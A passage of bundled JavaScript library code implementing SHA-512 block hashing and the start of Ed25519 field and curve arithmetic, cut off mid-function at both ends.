    0x1482353b,
    0xa2bfe8a1,
    0x4cf10364,
    0xa81a664b,
    0xbc423001,
    0xc24b8b70,
    0xd0f89791,
    0xc76c51a3,
    0x0654be30,
    0xd192e819,
    0xd6ef5218,
    0xd6990624,
    0x5565a910,
    0xf40e3585,
    0x5771202a,
    0x106aa070,
    0x32bbd1b8,
    0x19a4c116,
    0xb8d2d0c8,
    0x1e376c08,
    0x5141ab53,
    0x2748774c,
    0xdf8eeb99,
    0x34b0bcb5,
    0xe19b48a8,
    0x391c0cb3,
    0xc5c95a63,
    0x4ed8aa4a,
    0xe3418acb,
    0x5b9cca4f,
    0x7763e373,
    0x682e6ff3,
    0xd6b2b8a3,
    0x748f82ee,
    0x5defb2fc,
    0x78a5636f,
    0x43172f60,
    0x84c87814,
    0xa1f0ab72,
    0x8cc70208,
    0x1a6439ec,
    0x90befffa,
    0x23631e28,
    0xa4506ceb,
    0xde82bde9,
    0xbef9a3f7,
    0xb2c67915,
    0xc67178f2,
    0xe372532b,
    0xca273ece,
    0xea26619c,
    0xd186b8c7,
    0x21c0c207,
    0xeada7dd6,
    0xcde0eb1e,
    0xf57d4f7f,
    0xee6ed178,
    0x06f067aa,
    0x72176fba,
    0x0a637dc5,
    0xa2c898a6,
    0x113f9804,
    0xbef90dae,
    0x1b710b35,
    0x131c471b,
    0x28db77f5,
    0x23047d84,
    0x32caab7b,
    0x40c72493,
    0x3c9ebe0a,
    0x15c9bebc,
    0x431d67c4,
    0x9c100d4c,
    0x4cc5d4be,
    0xcb3e42b6,
    0x597f299c,
    0xfc657e2a,
    0x5fcb6fab,
    0x3ad6faec,
    0x6c44198c,
    0x4a475817
]);
function $2cc6b12a8ccb780d$var$hashBlocks(wh, wl, hh, hl, m, pos, len) {
    var ah0 = hh[0], ah1 = hh[1], ah2 = hh[2], ah3 = hh[3], ah4 = hh[4], ah5 = hh[5], ah6 = hh[6], ah7 = hh[7], al0 = hl[0], al1 = hl[1], al2 = hl[2], al3 = hl[3], al4 = hl[4], al5 = hl[5], al6 = hl[6], al7 = hl[7];
    var h, l;
    var th, tl;
    var a, b, c, d;
    while(len >= 128){
        for(var i = 0; i < 16; i++){
            var j = 8 * i + pos;
            wh[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(m, j);
            wl[i] = $ddd89ca0ca71c6d3$exports.readUint32BE(m, j + 4);
        }
        for(var i = 0; i < 80; i++){
            var bh0 = ah0;
            var bh1 = ah1;
            var bh2 = ah2;
            var bh3 = ah3;
            var bh4 = ah4;
            var bh5 = ah5;
            var bh6 = ah6;
            var bh7 = ah7;
            var bl0 = al0;
            var bl1 = al1;
            var bl2 = al2;
            var bl3 = al3;
            var bl4 = al4;
            var bl5 = al5;
            var bl6 = al6;
            var bl7 = al7;
            // add
            h = ah7;
            l = al7;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            // Sigma1
            h = (ah4 >>> 14 | al4 << 18) ^ (ah4 >>> 18 | al4 << 14) ^ (al4 >>> 9 | ah4 << 23);
            l = (al4 >>> 14 | ah4 << 18) ^ (al4 >>> 18 | ah4 << 14) ^ (ah4 >>> 9 | al4 << 23);
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // Ch
            h = ah4 & ah5 ^ ~ah4 & ah6;
            l = al4 & al5 ^ ~al4 & al6;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // K
            h = $2cc6b12a8ccb780d$var$K[i * 2];
            l = $2cc6b12a8ccb780d$var$K[i * 2 + 1];
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // w
            h = wh[i % 16];
            l = wl[i % 16];
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            th = c & 0xffff | d << 16;
            tl = a & 0xffff | b << 16;
            // add
            h = th;
            l = tl;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            // Sigma0
            h = (ah0 >>> 28 | al0 << 4) ^ (al0 >>> 2 | ah0 << 30) ^ (al0 >>> 7 | ah0 << 25);
            l = (al0 >>> 28 | ah0 << 4) ^ (ah0 >>> 2 | al0 << 30) ^ (ah0 >>> 7 | al0 << 25);
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            // Maj
            h = ah0 & ah1 ^ ah0 & ah2 ^ ah1 & ah2;
            l = al0 & al1 ^ al0 & al2 ^ al1 & al2;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            bh7 = c & 0xffff | d << 16;
            bl7 = a & 0xffff | b << 16;
            // add
            h = bh3;
            l = bl3;
            a = l & 0xffff;
            b = l >>> 16;
            c = h & 0xffff;
            d = h >>> 16;
            h = th;
            l = tl;
            a += l & 0xffff;
            b += l >>> 16;
            c += h & 0xffff;
            d += h >>> 16;
            b += a >>> 16;
            c += b >>> 16;
            d += c >>> 16;
            bh3 = c & 0xffff | d << 16;
            bl3 = a & 0xffff | b << 16;
            ah1 = bh0;
            ah2 = bh1;
            ah3 = bh2;
            ah4 = bh3;
            ah5 = bh4;
            ah6 = bh5;
            ah7 = bh6;
            ah0 = bh7;
            al1 = bl0;
            al2 = bl1;
            al3 = bl2;
            al4 = bl3;
            al5 = bl4;
            al6 = bl5;
            al7 = bl6;
            al0 = bl7;
            if (i % 16 === 15) for(var j = 0; j < 16; j++){
                // add
                h = wh[j];
                l = wl[j];
                a = l & 0xffff;
                b = l >>> 16;
                c = h & 0xffff;
                d = h >>> 16;
                h = wh[(j + 9) % 16];
                l = wl[(j + 9) % 16];
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                // sigma0
                th = wh[(j + 1) % 16];
                tl = wl[(j + 1) % 16];
                h = (th >>> 1 | tl << 31) ^ (th >>> 8 | tl << 24) ^ th >>> 7;
                l = (tl >>> 1 | th << 31) ^ (tl >>> 8 | th << 24) ^ (tl >>> 7 | th << 25);
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                // sigma1
                th = wh[(j + 14) % 16];
                tl = wl[(j + 14) % 16];
                h = (th >>> 19 | tl << 13) ^ (tl >>> 29 | th << 3) ^ th >>> 6;
                l = (tl >>> 19 | th << 13) ^ (th >>> 29 | tl << 3) ^ (tl >>> 6 | th << 26);
                a += l & 0xffff;
                b += l >>> 16;
                c += h & 0xffff;
                d += h >>> 16;
                b += a >>> 16;
                c += b >>> 16;
                d += c >>> 16;
                wh[j] = c & 0xffff | d << 16;
                wl[j] = a & 0xffff | b << 16;
            }
        }
        // add
        h = ah0;
        l = al0;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[0];
        l = hl[0];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[0] = ah0 = c & 0xffff | d << 16;
        hl[0] = al0 = a & 0xffff | b << 16;
        h = ah1;
        l = al1;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[1];
        l = hl[1];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[1] = ah1 = c & 0xffff | d << 16;
        hl[1] = al1 = a & 0xffff | b << 16;
        h = ah2;
        l = al2;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[2];
        l = hl[2];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[2] = ah2 = c & 0xffff | d << 16;
        hl[2] = al2 = a & 0xffff | b << 16;
        h = ah3;
        l = al3;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[3];
        l = hl[3];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[3] = ah3 = c & 0xffff | d << 16;
        hl[3] = al3 = a & 0xffff | b << 16;
        h = ah4;
        l = al4;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[4];
        l = hl[4];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[4] = ah4 = c & 0xffff | d << 16;
        hl[4] = al4 = a & 0xffff | b << 16;
        h = ah5;
        l = al5;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[5];
        l = hl[5];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[5] = ah5 = c & 0xffff | d << 16;
        hl[5] = al5 = a & 0xffff | b << 16;
        h = ah6;
        l = al6;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[6];
        l = hl[6];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[6] = ah6 = c & 0xffff | d << 16;
        hl[6] = al6 = a & 0xffff | b << 16;
        h = ah7;
        l = al7;
        a = l & 0xffff;
        b = l >>> 16;
        c = h & 0xffff;
        d = h >>> 16;
        h = hh[7];
        l = hl[7];
        a += l & 0xffff;
        b += l >>> 16;
        c += h & 0xffff;
        d += h >>> 16;
        b += a >>> 16;
        c += b >>> 16;
        d += c >>> 16;
        hh[7] = ah7 = c & 0xffff | d << 16;
        hl[7] = al7 = a & 0xffff | b << 16;
        pos += 128;
        len -= 128;
    }
    return pos;
}
function $2cc6b12a8ccb780d$var$hash(data) {
    var h = new $2cc6b12a8ccb780d$var$SHA512();
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$2cc6b12a8ccb780d$exports.hash = $2cc6b12a8ccb780d$var$hash;



$a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH = 64;
$a1d7ebd43ba0a83c$exports.PUBLIC_KEY_LENGTH = 32;
$a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH = 64;
$a1d7ebd43ba0a83c$exports.SEED_LENGTH = 32;
// Returns new zero-filled 16-element GF (Float64Array).
// If passed an array of numbers, prefills the returned
// array with them.
//
// We use Float64Array, because we need 48-bit numbers
// for this implementation.
function $a1d7ebd43ba0a83c$var$gf(init) {
    const r = new Float64Array(16);
    if (init) for(let i = 0; i < init.length; i++)r[i] = init[i];
    return r;
}
// Base point.
const $a1d7ebd43ba0a83c$var$_9 = new Uint8Array(32);
$a1d7ebd43ba0a83c$var$_9[0] = 9;
const $a1d7ebd43ba0a83c$var$gf0 = $a1d7ebd43ba0a83c$var$gf();
const $a1d7ebd43ba0a83c$var$gf1 = $a1d7ebd43ba0a83c$var$gf([
    1
]);
const $a1d7ebd43ba0a83c$var$D = $a1d7ebd43ba0a83c$var$gf([
    0x78a3,
    0x1359,
    0x4dca,
    0x75eb,
    0xd8ab,
    0x4141,
    0x0a4d,
    0x0070,
    0xe898,
    0x7779,
    0x4079,
    0x8cc7,
    0xfe73,
    0x2b6f,
    0x6cee,
    0x5203
]);
const $a1d7ebd43ba0a83c$var$D2 = $a1d7ebd43ba0a83c$var$gf([
    0xf159,
    0x26b2,
    0x9b94,
    0xebd6,
    0xb156,
    0x8283,
    0x149a,
    0x00e0,
    0xd130,
    0xeef3,
    0x80f2,
    0x198e,
    0xfce7,
    0x56df,
    0xd9dc,
    0x2406
]);
const $a1d7ebd43ba0a83c$var$X = $a1d7ebd43ba0a83c$var$gf([
    0xd51a,
    0x8f25,
    0x2d60,
    0xc956,
    0xa7b2,
    0x9525,
    0xc760,
    0x692c,
    0xdc5c,
    0xfdd6,
    0xe231,
    0xc0a4,
    0x53fe,
    0xcd6e,
    0x36d3,
    0x2169
]);
const $a1d7ebd43ba0a83c$var$Y = $a1d7ebd43ba0a83c$var$gf([
    0x6658,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666,
    0x6666
]);
const $a1d7ebd43ba0a83c$var$I = $a1d7ebd43ba0a83c$var$gf([
    0xa0b0,
    0x4a0e,
    0x1b27,
    0xc4ee,
    0xe478,
    0xad2f,
    0x1806,
    0x2f43,
    0xd7a7,
    0x3dfb,
    0x0099,
    0x2b4d,
    0xdf0b,
    0x4fc1,
    0x2480,
    0x2b83
]);
function $a1d7ebd43ba0a83c$var$set25519(r, a) {
    for(let i = 0; i < 16; i++)r[i] = a[i] | 0;
}
function $a1d7ebd43ba0a83c$var$car25519(o) {
    let c = 1;
    for(let i = 0; i < 16; i++){
        let v = o[i] + c + 65535;
        c = Math.floor(v / 65536);
        o[i] = v - c * 65536;
    }
    o[0] += c - 1 + 37 * (c - 1);
}
function $a1d7ebd43ba0a83c$var$sel25519(p, q, b) {
    const c = ~(b - 1);
    for(let i = 0; i < 16; i++){
        const t = c & (p[i] ^ q[i]);
        p[i] ^= t;
        q[i] ^= t;
    }
}
function $a1d7ebd43ba0a83c$var$pack25519(o, n) {
    const m = $a1d7ebd43ba0a83c$var$gf();
    const t = $a1d7ebd43ba0a83c$var$gf();
    for(let i = 0; i < 16; i++)t[i] = n[i];
    $a1d7ebd43ba0a83c$var$car25519(t);
    $a1d7ebd43ba0a83c$var$car25519(t);
    $a1d7ebd43ba0a83c$var$car25519(t);
    for(let j = 0; j < 2; j++){
        m[0] = t[0] - 0xffed;
        for(let i = 1; i < 15; i++){
            m[i] = t[i] - 0xffff - (m[i - 1] >> 16 & 1);
            m[i - 1] &= 0xffff;
        }
        m[15] = t[15] - 0x7fff - (m[14] >> 16 & 1);
        const b = m[15] >> 16 & 1;
        m[14] &= 0xffff;
        $a1d7ebd43ba0a83c$var$sel25519(t, m, 1 - b);
    }
    for(let i = 0; i < 16; i++){
        o[2 * i] = t[i] & 0xff;
        o[2 * i + 1] = t[i] >> 8;
    }
}
function $a1d7ebd43ba0a83c$var$verify32(x, y) {
    let d = 0;
    for(let i = 0; i < 32; i++)d |= x[i] ^ y[i];
    return (1 & d - 1 >>> 8) - 1;
}
function $a1d7ebd43ba0a83c$var$neq25519(a, b) {
    const c = new Uint8Array(32);
    const d = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(c, a);
    $a1d7ebd43ba0a83c$var$pack25519(d, b);
    return $a1d7ebd43ba0a83c$var$verify32(c, d);
}
function $a1d7ebd43ba0a83c$var$par25519(a) {
    const d = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(d, a);
    return d[0] & 1;
}
function $a1d7ebd43ba0a83c$var$unpack25519(o, n) {
    for(let i = 0; i < 16; i++)o[i] = n[2 * i] + (n[2 * i + 1] << 8);
    o[15] &= 0x7fff;
}
function $a1d7ebd43ba0a83c$var$add(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] + b[i];
}
function $a1d7ebd43ba0a83c$var$sub(o, a, b) {
    for(let i = 0; i < 16; i++)o[i] = a[i] - b[i];
}
function $a1d7ebd43ba0a83c$var$mul(o, a, b) {
    let v, c, t0 = 0, t1 = 0, t2 = 0, t3 = 0, t4 = 0, t5 = 0, t6 = 0, t7 = 0, t8 = 0, t9 = 0, t10 = 0, t11 = 0, t12 = 0, t13 = 0, t14 = 0, t15 = 0, t16 = 0, t17 = 0, t18 = 0, t19 = 0, t20 = 0, t21 = 0, t22 = 0, t23 = 0, t24 = 0, t25 = 0, t26 = 0, t27 = 0, t28 = 0, t29 = 0, t30 = 0, b0 = b[0], b1 = b[1], b2 = b[2], b3 = b[3], b4 = b[4], b5 = b[5], b6 = b[6], b7 = b[7], b8 = b[8], b9 = b[9], b10 = b[10], b11 = b[11], b12 = b[12], b13 = b[13], b14 = b[14], b15 = b[15];
    v = a[0];
    t0 += v * b0;
    t1 += v * b1;
    t2 += v * b2;
    t3 += v * b3;
    t4 += v * b4;
    t5 += v * b5;
    t6 += v * b6;
    t7 += v * b7;
    t8 += v * b8;
    t9 += v * b9;
    t10 += v * b10;
    t11 += v * b11;
    t12 += v * b12;
    t13 += v * b13;
    t14 += v * b14;
    t15 += v * b15;
    v = a[1];
    t1 += v * b0;
    t2 += v * b1;
    t3 += v * b2;
    t4 += v * b3;
    t5 += v * b4;
    t6 += v * b5;
    t7 += v * b6;
    t8 += v * b7;
    t9 += v * b8;
    t10 += v * b9;
    t11 += v * b10;
    t12 += v * b11;
    t13 += v * b12;
    t14 += v * b13;
    t15 += v * b14;
    t16 += v * b15;
    v = a[2];
    t2 += v * b0;
    t3 += v * b1;
    t4 += v * b2;
    t5 += v * b3;
    t6 += v * b4;
    t7 += v * b5;
    t8 += v * b6;
    t9 += v * b7;
    t10 += v * b8;
    t11 += v * b9;
    t12 += v * b10;
    t13 += v * b11;
    t14 += v * b12;
    t15 += v * b13;
    t16 += v * b14;
    t17 += v * b15;
    v = a[3];
    t3 += v * b0;
    t4 += v * b1;
    t5 += v * b2;
    t6 += v * b3;
    t7 += v * b4;
    t8 += v * b5;
    t9 += v * b6;
    t10 += v * b7;
    t11 += v * b8;
    t12 += v * b9;
    t13 += v * b10;
    t14 += v * b11;
    t15 += v * b12;
    t16 += v * b13;
    t17 += v * b14;
    t18 += v * b15;
    v = a[4];
    t4 += v * b0;
    t5 += v * b1;
    t6 += v * b2;
    t7 += v * b3;
    t8 += v * b4;
    t9 += v * b5;
    t10 += v * b6;
    t11 += v * b7;
    t12 += v * b8;
    t13 += v * b9;
    t14 += v * b10;
    t15 += v * b11;
    t16 += v * b12;
    t17 += v * b13;
    t18 += v * b14;
    t19 += v * b15;
    v = a[5];
    t5 += v * b0;
    t6 += v * b1;
    t7 += v * b2;
    t8 += v * b3;
    t9 += v * b4;
    t10 += v * b5;
    t11 += v * b6;
    t12 += v * b7;
    t13 += v * b8;
    t14 += v * b9;
    t15 += v * b10;
    t16 += v * b11;
    t17 += v * b12;
    t18 += v * b13;
    t19 += v * b14;
    t20 += v * b15;
    v = a[6];
    t6 += v * b0;
    t7 += v * b1;
    t8 += v * b2;
    t9 += v * b3;
    t10 += v * b4;
    t11 += v * b5;
    t12 += v * b6;
    t13 += v * b7;
    t14 += v * b8;
    t15 += v * b9;
    t16 += v * b10;
    t17 += v * b11;
    t18 += v * b12;
    t19 += v * b13;
    t20 += v * b14;
    t21 += v * b15;
    v = a[7];
    t7 += v * b0;
    t8 += v * b1;
    t9 += v * b2;
    t10 += v * b3;
    t11 += v * b4;
    t12 += v * b5;
    t13 += v * b6;
    t14 += v * b7;
    t15 += v * b8;
    t16 += v * b9;
    t17 += v * b10;
    t18 += v * b11;
    t19 += v * b12;
    t20 += v * b13;
    t21 += v * b14;
    t22 += v * b15;
    v = a[8];
    t8 += v * b0;
    t9 += v * b1;
    t10 += v * b2;
    t11 += v * b3;
    t12 += v * b4;
    t13 += v * b5;
    t14 += v * b6;
    t15 += v * b7;
    t16 += v * b8;
    t17 += v * b9;
    t18 += v * b10;
    t19 += v * b11;
    t20 += v * b12;
    t21 += v * b13;
    t22 += v * b14;
    t23 += v * b15;
    v = a[9];
    t9 += v * b0;
    t10 += v * b1;
    t11 += v * b2;
    t12 += v * b3;
    t13 += v * b4;
    t14 += v * b5;
    t15 += v * b6;
    t16 += v * b7;
    t17 += v * b8;
    t18 += v * b9;
    t19 += v * b10;
    t20 += v * b11;
    t21 += v * b12;
    t22 += v * b13;
    t23 += v * b14;
    t24 += v * b15;
    v = a[10];
    t10 += v * b0;
    t11 += v * b1;
    t12 += v * b2;
    t13 += v * b3;
    t14 += v * b4;
    t15 += v * b5;
    t16 += v * b6;
    t17 += v * b7;
    t18 += v * b8;
    t19 += v * b9;
    t20 += v * b10;
    t21 += v * b11;
    t22 += v * b12;
    t23 += v * b13;
    t24 += v * b14;
    t25 += v * b15;
    v = a[11];
    t11 += v * b0;
    t12 += v * b1;
    t13 += v * b2;
    t14 += v * b3;
    t15 += v * b4;
    t16 += v * b5;
    t17 += v * b6;
    t18 += v * b7;
    t19 += v * b8;
    t20 += v * b9;
    t21 += v * b10;
    t22 += v * b11;
    t23 += v * b12;
    t24 += v * b13;
    t25 += v * b14;
    t26 += v * b15;
    v = a[12];
    t12 += v * b0;
    t13 += v * b1;
    t14 += v * b2;
    t15 += v * b3;
    t16 += v * b4;
    t17 += v * b5;
    t18 += v * b6;
    t19 += v * b7;
    t20 += v * b8;
    t21 += v * b9;
    t22 += v * b10;
    t23 += v * b11;
    t24 += v * b12;
    t25 += v * b13;
    t26 += v * b14;
    t27 += v * b15;
    v = a[13];
    t13 += v * b0;
    t14 += v * b1;
    t15 += v * b2;
    t16 += v * b3;
    t17 += v * b4;
    t18 += v * b5;
    t19 += v * b6;
    t20 += v * b7;
    t21 += v * b8;
    t22 += v * b9;
    t23 += v * b10;
    t24 += v * b11;
    t25 += v * b12;
    t26 += v * b13;
    t27 += v * b14;
    t28 += v * b15;
    v = a[14];
    t14 += v * b0;
    t15 += v * b1;
    t16 += v * b2;
    t17 += v * b3;
    t18 += v * b4;
    t19 += v * b5;
    t20 += v * b6;
    t21 += v * b7;
    t22 += v * b8;
    t23 += v * b9;
    t24 += v * b10;
    t25 += v * b11;
    t26 += v * b12;
    t27 += v * b13;
    t28 += v * b14;
    t29 += v * b15;
    v = a[15];
    t15 += v * b0;
    t16 += v * b1;
    t17 += v * b2;
    t18 += v * b3;
    t19 += v * b4;
    t20 += v * b5;
    t21 += v * b6;
    t22 += v * b7;
    t23 += v * b8;
    t24 += v * b9;
    t25 += v * b10;
    t26 += v * b11;
    t27 += v * b12;
    t28 += v * b13;
    t29 += v * b14;
    t30 += v * b15;
    t0 += 38 * t16;
    t1 += 38 * t17;
    t2 += 38 * t18;
    t3 += 38 * t19;
    t4 += 38 * t20;
    t5 += 38 * t21;
    t6 += 38 * t22;
    t7 += 38 * t23;
    t8 += 38 * t24;
    t9 += 38 * t25;
    t10 += 38 * t26;
    t11 += 38 * t27;
    t12 += 38 * t28;
    t13 += 38 * t29;
    t14 += 38 * t30;
    // t15 left as is
    // first car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    // second car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    o[0] = t0;
    o[1] = t1;
    o[2] = t2;
    o[3] = t3;
    o[4] = t4;
    o[5] = t5;
    o[6] = t6;
    o[7] = t7;
    o[8] = t8;
    o[9] = t9;
    o[10] = t10;
    o[11] = t11;
    o[12] = t12;
    o[13] = t13;
    o[14] = t14;
    o[15] = t15;
}
function $a1d7ebd43ba0a83c$var$square(o, a) {
    $a1d7ebd43ba0a83c$var$mul(o, a, a);
}
function $a1d7ebd43ba0a83c$var$inv25519(o, i) {
    const c = $a1d7ebd43ba0a83c$var$gf();
    let a;
    for(a = 0; a < 16; a++)c[a] = i[a];
    for(a = 253; a >= 0; a--){
        $a1d7ebd43ba0a83c$var$square(c, c);
        if (a !== 2 && a !== 4) $a1d7ebd43ba0a83c$var$mul(c, c, i);
    }
    for(a = 0; a < 16; a++)o[a] = c[a];
}
function $a1d7ebd43ba0a83c$var$pow2523(o, i) {
    const c = $a1d7ebd43ba0a83c$var$gf();
    let a;
    for(a = 0; a < 16; a++)c[a] = i[a];
    for(a = 250; a >= 0; a--){
        $a1d7ebd43ba0a83c$var$square(c, c);
        if (a !== 1) $a1d7ebd43ba0a83c$var$mul(c, c, i);
    }
    for(a = 0; a < 16; a++)o[a] = c[a];
}
function $a1d7ebd43ba0a83c$var$edadd(p, q) {
    const a = $a1d7ebd43ba0a83c$var$gf(), b = $a1d7ebd43ba0a83c$var$gf(), c = $a1d7ebd43ba0a83c$var$gf(), d = $a1d7ebd43ba0a83c$var$gf(), e = $a1d7ebd43ba0a83c$var$gf(), f = $a1d7ebd43ba0a83c$var$gf(), g = $a1d7ebd43ba0a83c$var$gf(), h = $a1d7ebd43ba0a83c$var$gf(), t = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$sub(a, p[1], p[0]);
    $a1d7ebd43ba0a83c$var$sub(t, q[1], q[0]);
    $a1d7ebd43ba0a83c$var$mul(a, a, t);
    $a1d7ebd43ba0a83c$var$add(b, p[0], p[1]);
    $a1d7ebd43ba0a83c$var$add(t, q[0], q[1]);
    $a1d7ebd43ba0a83c$var$mul(b, b, t);
    $a1d7ebd43ba0a83c$var$mul(c, p[3], q[3]);
    $a1d7ebd43ba0a83c$var$mul(c, c, $a1d7ebd43ba0a83c$var$D2);
    $a1d7ebd43ba0a83c$var$mul(d, p[2], q[2]);
    $a1d7ebd43ba0a83c$var$add(d, d, d);
    $a1d7ebd43ba0a83c$var$sub(e, b, a);
    $a1d7ebd43ba0a83c$var$sub(f, d, c);
    $a1d7ebd43ba0a83c$var$add(g, d, c);
    $a1d7ebd43ba0a83c$var$add(h, b, a);
    $a1d7ebd43ba0a83c$var$mul(p[0], e, f);
    $a1d7ebd43ba0a83c$var$mul(p[1], h, g);
    $a1d7ebd43ba0a83c$var$mul(p[2], g, f);
    $a1d7ebd43ba0a83c$var$mul(p[3], e, h);
}
function $a1d7ebd43ba0a83c$var$cswap(p, q, b) {
    for(let i = 0; i < 4; i++)$a1d7ebd43ba0a83c$var$sel25519(p[i], q[i], b);
}
function $a1d7ebd43ba0a83c$var$pack(r, p) {
    const tx = $a1d7ebd43ba0a83c$var$gf(), ty = $a1d7ebd43ba0a83c$var$gf(), zi = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$inv25519(zi, p[2]);
    $a1d7ebd43ba0a83c$var$mul(tx, p[0], zi);
    $a1d7ebd43ba0a83c$var$mul(ty, p[1], zi);
    $a1d7ebd43ba0a83c$var$pack25519(r, ty);
    r[31] ^= $a1d7ebd43ba0a83c$var$par25519(tx) << 7;
}
function $a1d7ebd43ba0a83c$var$scalarmult(p, q, s) {
    $a1d7ebd43ba0a83c$var$set25519(p[0], $a1d7ebd43ba0a83c$var$gf0);
    $a1d7ebd43ba0a83c$var$set25519(p[1], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$set25519(p[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$set25519(p[3], $a1d7ebd43ba0a83c$var$gf0);
    for(let i = 255; i >= 0; --i){
